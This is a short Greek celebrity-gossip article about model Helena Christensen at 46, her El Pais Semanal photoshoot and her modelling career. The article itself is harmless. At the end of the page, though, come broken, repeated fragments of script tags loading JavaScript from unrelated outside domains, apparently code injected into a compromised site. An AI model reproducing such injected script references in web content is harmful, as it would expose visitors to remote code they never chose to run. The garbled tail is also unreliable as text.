Καλλονή ετών 46!

Καλλονή ετών 46!

Ως ένα από τα πιο πετυχημένα μοντέλα στον κόσμο η Helena Christensen μπορεί πάντα να κοσμεί τα εξώφυλλα περιοδικών.

Έτσι δεν προκαλεί εντύπωση η ευκολία με την οποία η 46χρονη καλλονή από τη Δανία βγάζει το σεξαπίλ της στην τελευταία της φωτογράφιση για το περιοδικό El Pais Semanal.

Με βρεγμένο λουκ, μακιγιάζ που τονίζει τα καταπράσινα γατίσια μάτια της και ρούχα που μόνο γυναίκες με υπέροχο κορμί σαν το δικό της μπορούν να φορέσουν, η Helena Christensen αποδεικνύει πως η ομορφιά της είναι διαχρονική και πως αν και τα χρόνια περνούν εκείνη δεν έχει αλλάξει.

Η μελαχρινή καλλονή, μεσουρανούσε στις πασαρέλες τη δεκαετία του ’80 ενώ το 1986 εκπροσώπησε τη Δανία στον διαγωνισμό Μις Κόσμος το 1986. Από τότε άνοιξαν διάπλατα οι πόρτες για εκείνη, με δεκάδες μεγάλα περιοδικά όπως η Vogue και το Elle να την έχουν φιλοξενήσει στα εξώφυλλά τους ενώ έχει συμμετάσχει και σε σόου της Victoria’s Secret.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >